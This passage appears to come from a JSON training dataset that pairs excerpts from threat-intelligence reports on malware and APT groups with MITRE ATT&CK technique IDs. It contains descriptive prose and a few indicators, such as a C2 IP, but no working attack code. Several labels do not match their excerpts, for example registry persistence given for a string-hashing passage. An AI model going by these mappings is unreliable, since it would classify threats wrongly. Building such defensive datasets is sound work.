based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "While the ports associated with this sample\u2019s configuration pertain normally to HTTP, HTTPS, or DNS, network communication takes place via raw sockets", + "output": "- T1095: Non-Application Layer Protocol\n- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If the victim appears valuable to the attackers, a GRIFFON implant installer is pushed to the victim\u2019s workstation. This module stores another instance of the GRIFFON implant inside the registry to achieve persistence. Here is a PowerLinks-style method used by the attackers to achieve persistence and execute the GRIFFON implant at each user logon. The new GRIFFON implant is written to the hard drive before each execution, limiting the \u201cfile-less\u201d aspect of this method", + "output": "- T1059.007: Command and Scripting Interpreter - JavaScript" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"This folder is used as a temporary location to copy all files from a newly connected logical drive to and upload them to the C2 server. The files are transferred to the hardcoded C2 server \"\"195.62.52.93\"\" one by one via HTTP POST method. The following request is used which also includes information about the victim, the file to be transferred as well as the source drive\"", + "output": "- T1071.001: Application Layer Protocol - Web Protocols\n- T1083: File and Directory Discovery\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Indeed, any decent firewall would block incoming packets to\u00a0any ports that have not explicitly been opened for operational purposes. However, with Chaos using a raw socket, the backdoor can be triggered on ports running an existing legitimate service. As an example, a Webserver that would only expose SSH (22), HTTP (80) and HTTPS (443) would not be reachable via a traditional backdoor due to the fact that those services are in use, but with Chaos it becomes possible", + "output": "- T1205: Traffic Signaling" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Netsh commands for Windows Firewall provide a command-line alternative to the capabilities of the Windows Firewall Control Panel utility. By using the Netsh firewall commands, you can configure and view Windows Firewall exceptions and configuration settings", + "output": "- T1518.001: Software Discovery - Security Software Discovery\n- T1562.004: Impair Defenses - Disable or Modify System Firewall" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This specific key is set to point towards the path of the previously copied Cardinal RAT executable path. The executable will periodically query this registry key to ensure it is set appropriately. If the executable finds the registry key has been deleted, it will re-set it. The Load registry key acts as a persistence mechanism, ensuring that this Cardinal RAT executes every time a user logs on", + "output": "- T1112: Modify Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Additional tools were recovered during the incident, including a network scanning/enumeration tool, the archiving tool WinRAR and a bespoke Microsoft SharePoint enumeration and data dumping tool, known as \u2018spwebmember", + "output": "- T1213.002: Data from Information Repositories - Sharepoint\n- T1018: Remote System Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The group has the capability to set up phishing infrastructure to mimic well known websites and trick victims to enter their credentials. This is one of the main methods used by this actor to collect email addresses that later will be used to send spearphishing emails", + "output": "- T1586.002: Compromise Accounts - Email Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Use of custom routines to decrypt strings (Deobfuscate/Decode Files or Information [T1140]) - Ability to self-delete once installed (Indicator Removal on Host: File Deletion [T1070.004]) - Masquerade as GrowlHelper (Masquerading: Masquerade Task or Service [T1036.004]) - And as Software Update Check (Masquerading: Masquerade Task or Service [T1036.004]) - Decrypt strings in-memory, per CIA guidelines (Obfuscated Files or Information [T1027", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "With the emergence of the Log4j security vulnerability, we\u2019ve already seen multiple threat actors, mostly financially motivated, immediately add it to their exploitation arsenal. It comes as no surprise that some nation-sponsored actors also saw this new vulnerability as an opportunity to strike before potential targets have identified and patched the affected systems", + "output": "- T1595.002: Active Scanning - Vulnerability Scanning" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The attack group has made incremental changes to ZeroT since our last analysis. The encrypted ZeroT payload, named Mctl.mui, is decoded in memory revealing a similarly tampered PE header and only slightly modified code when compared to ZeroT payloads we analyzed previously", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Depending on the Ramsay version, file collection won\u2019t be restricted to the local system drive, but also will search additional drives such as network or removable drives", + "output": "- T1039: Data from Network Shared Drive" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We were able to expand on some of the findings about the group and provide insights into the additional variants that it uses. We were able to trace the implant back to at least 2015, where it also had variants intended to hijack the execution of the Telegram and Chrome applications as a persistence method", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Avira\u2019s Advanced Threat Research team, has been tracking Mustang Panda APT for a while. According to Avira\u2019s telemetry data, Mustang Panda mostly targets Asia-Pacific (APAC) countries and uses Cobalt or PlugX as payload", + "output": "- T1560.001: Archive Collected Data - Archive via Utility\n- T1049: System Network Connections Discovery\n- T1204.002: User Execution - Malicious File\n- T1057: Process Discovery\n- T1083: File and Directory Discovery\n- T1016: System Network Configuration Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It also deletes Windows Event Logs : Application, Security, Setup, System. It is less focused on deleting documents", + "output": "- T1070.001: Indicator Removal - Clear Windows Event Logs" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We have been tracking RDAT since 2017, when we first saw this tool uploaded to a webshell related to the TwoFace webshell discussed in our Striking Oil blog published on September 26, 2017. RDAT has been under active development since 2017, resulting in multiple variations of the tool that rely on both HTTP and DNS tunneling for C2 communications. In June 2018, the developer of RDAT added the ability to use Exchange Web Services (EWS) to send and receive emails for C2 communications. This email-based C2 channel is novel in its design, as it relies on steganography to hide commands and exfiltrates data within BMP images attached to the emails. The combination of using emails with steganographic images to carry the data across the C2 can result in this activity being much more difficult to detect and allow for higher chances of defense evasion", + "output": "- T1001.002: Data Obfuscation - Steganography\n- T1071.003: Application Layer Protocol - Mail Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Comnie Malware Family Comnie uses the RC4 algorithm in multiple locations both to obfuscate strings used by the malware, as well as for network communication. More information about how Comnie handles identified security products may be found in the technical analysis in the Appendix. Comnie is able to achieve persistence via a .lnk file that is stored within the victim\u2019s startup path. When originally run, Comnie will convert itself from an executable file to a DLL and will write this newly created DLL to the host machine\u2019s %APPDATA% directory. Unit 42 has observed a total of two variants of Comnie. In older variants, Comnie was found to look for the \u2018++a++\u2019 markers. The example C2s used by older variants of Comnie demonstrates this", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "DropBook\u2019s capabilities include checking installed programs and file names for reconnaissance, executing shell commands received from Facebook or Simplenote, and fetching additional payloads from Dropbox and running them", + "output": "- T1083: File and Directory Discovery\n- T1105: Ingress Tool Transfer\n- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware uploads the stolen data to third-party cloud storage providers. The sample identified in the wild is configured to upload to pCloud, but functionality to upload to Dropbox, Box and Yandex Cloud is also included", + "output": "- T1102.002: Web Service - Bidirectional Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Valak C2 traffic returns data as encoded ASCII text that is decoded on the victim host and saved as malware items like script files, EXE used during the infection and data for registry updates for the Valak infection", + "output": "- T1132.001: Data Encoding - Standard Encoding\n- T1564.004: Hide Artifacts - NTFS File Attributes" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In addition to the encrypted strings table, BitPaymer replaces the remaining strings in the binary with hashes and uses an algorithm to match these hashes with strings that exist on the host. The hash algorithm has been replicated in Python below", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It is notable that we have only seen these exploitation attempts leverage publicly available malware such as Cobalt Strike and Meterpreter. While these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance. In 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks. This new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim\u2019s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. Also, its configuration is encrypted and is not base64 encoded anymore", + "output": "- T1560: Archive Collected Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Key points PureCrypter is a fully-featured loader being sold since at least March 2021 The malware has been observed distributing a variety of remote access trojans and information stealers The loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus softwar", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Gamaredon group has been active since at least 2013. Contrary to other APT groups, the Gamaredon group seems to make no effort in trying to stay under the radar. Typical Gamaredon compromise chain . While most of the recent publications have focused on the spearphishing emails together with the downloaders they contain, this blogpost focuses on the post-compromise tools deployed on these systems. Office macro injection module \u2013 CodeBuilder . We analyzed different variants of malicious modules used by the Gamaredon group to inject malicious macros or remote templates into documents already present on the compromised system. It then scans for documents with valid Word or Excel file extensions on all drives connected to the system. The most prevalent tools downloaded and installed on compromised machines can be broadly grouped into two different categories: downloaders and backdoors. Backdoors \u2013 file stealers . While some variations exist in functionalities, the main purpose of these modules is to enumerate all documents on a compromised system and upload them to the C&C server. The behavior of this module is quite straightforward: it scans the system for new Microsoft Office documents, both on local and removable drives, and uploads them to the C&C server. Quality of execution . We were able to collect numerous different samples of malicious scripts, executables and documents used by the Gamaredon group throughout their campaigns. Conclusion . Despite the simplicity of most of their tools, the Gamaredon group also is capable of deploying some novelty, such as their Outlook VBA module", + "output": "- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Emotet is an advanced, modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Additionally, Emotet is a polymorphic banking Trojan that can evade typical signature-based detection. It has several methods for maintaining persistence, including auto-start registry keys and services. Furthermore, Emotet is Virtual Machine-aware and can generate false indicators if run in a virtual environment", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The vmtools.dll file is a modified DLL that both ensures persistence and loads MSBuild.exe, which is the BADNEWS malware renamed to spoof a legitimate Microsoft Visual Studio tool. A number of commands are provided to the attackers, including the ability to download and execute additional information, upload documents of interest, and take screenshots of the desktop. This malware family used the new mutex \u2018com_mycompany_apps_appname_new\u2019. This variant of BADNEWS uses different filenames compared to previous versions. All of these files reside in the victim\u2019s %TEMP% directory: Other changes we noticed in this variant include how the malware obfuscates C2 information stored via dead drop resolvers. BADNEWS performs many of the expected functions associated with previous versions including keylogging and identifying files of interest. Unlike a previously reported variant, this version of BADNEWS no longer looks at USB drives for interesting files. It continues to seek out files with the following extensions: In order to prepare for C2 communication, BADNEWS will aggregate various victim information, which is appended to two strings. C2 communication is also updated from prior versions, with the following commands now supported by BADNEWS: During C2 communications, BADNEWS will communicate to the C2 previously identified via HTTP. Through the use of relatively new exploits, as well as a constantly evolving malware toolset, they aim to compromise prominent organizations and individuals to further their goals. One of the malware families tied to this group, BADNEWS, continues to be updated both in how it uses dead drop resolvers, as well as how it communicates with a remote C2 server", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Fast-paced intrusion \u2022 Very stealthy \u2022 Rapidly changing tactics \u2022 Employed advanced attack techniques 4) 4. All rights reserved.23 Our Response: Tackled Attacker WMI Usage ADVANCED ATTACK TECHNIQUES 24) 24. Captured entire functions of PS scripts, attacker commands, script output, etc. Wrote indicators based on observed attacker activity \u2022 Identified lateral movement, unique backdoors, credential theft, data theft, recon, persistence creation, etc. All rights reserved.25 Our Response: Increased PowerShell Visibility ADVANCED ATTACK TECHNIQUES 26) 26. All rights reserved.27 Our Response: Addressed Ticket Attacks ADVANCED ATTACK TECHNIQUES Event ID 4624 Event ID 4672 Event ID 4634 28) 28. All rights reserved.29 BONUS SLIDE: Even More WMI + PS FUN FACT: We saw the attacker test this backdoor before deployment 30) 30", + "output": "- T1550.003: Use Alternate Authentication Material - Pass the Ticket" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Stage2.exe is a beaconing implant that performs an HTTPS connection to download a JPG file hosted on Discord\u2019s content delivery network (CDN). Discord\u2019s CDN is a user-created service that allows users to host attachments and is not malicious. The hosted file is retrieved from the following URL", + "output": "- T1102: Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Volgmer payloads have been observed in 32-bit form as either executables or dynamic-link library (.dll) files. The malware uses a custom binary protocol to beacon back to the command and control (C2) server, often via TCP port 8080 or 8088, with some payloads implementing Secure Socket Layer (SSL) encryption to obfuscate communications", + "output": "- T1573.002: Encrypted Channel - Asymmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Encrypting the data. Exfiltrating gathered data through a POST request or by uploading it to an FTP server. Sending execution logs to a remote server", + "output": "- T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Spreadsheets and documents with customer lists, investments and trading operations - Internal presentations - Software licenses and credentials for trading software/platforms - Cookies and session information from browsers - Email credentials - Customer credit card information and proof of address/identity documents", + "output": "- T1539: Steal Web Session Cookie" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The C# variant of RogueRobin attempts to detect if it is executing in a sandbox environment using the same commands as in the PowerShell variant of RogueRobin. The series of commands, as seen in Table 2, include checks for virtualized environments, low memory, and processor counts, in addition to checks for common analysis tools running on the system. The Trojan also checks to see if a debugger is attached to its processes and will exit if it detects the presence of a debugger", + "output": "- T1497.001: Virtualization/Sandbox Evasion - System Checks\n- T1047: Windows Management Instrumentation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT39 facilitates lateral movement through myriad tools such as Remote Desktop Protocol (RDP), Secure Shell (SSH), PsExec, RemCom, and xCmdSvc. Custom tools such as REDTRIP, PINKTRIP, and BLUETRIP have also been used to create SOCKS5 proxies between infected hosts. In addition to using RDP for lateral movement, APT39 has used this protocol to maintain persistence in a victim environment. To complete its mission, APT39 typically archives stolen data with compression tools such as WinRAR or 7-Zip", + "output": "- T1560.001: Archive Collected Data - Archive via Utility\n- T1021.004: Remote Services - SSH\n- T1021.001: Remote Services - Remote Desktop Protocol\n- T1018: Remote System Discovery\n- T1090.001: Proxy - Internal Proxy\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "All this information is stored in the C:\\Users\\Public\\Videos\\si.ini file and sent in an email message, as an attachment, via SMTPS, using the default port 465. The email body contains the string SI (which probably stands for System Information), the recipient is sym777.g@post.cz. For all email exchange, the message\u2019s Subject: set to the id", + "output": "- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If no exceptions occur, the Windows executable drops a DLL file in the user's AppData\\Local\\Temp\\ directory, creates a randomly-named folder under C:\\ProgramData\\ directory and moves the DLL under that folder as a random file name. This Redaman DLL is made persistent through a scheduled Windows task with the following properties", + "output": "- T1036.004: Masquerading - Masquerade Task or Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. 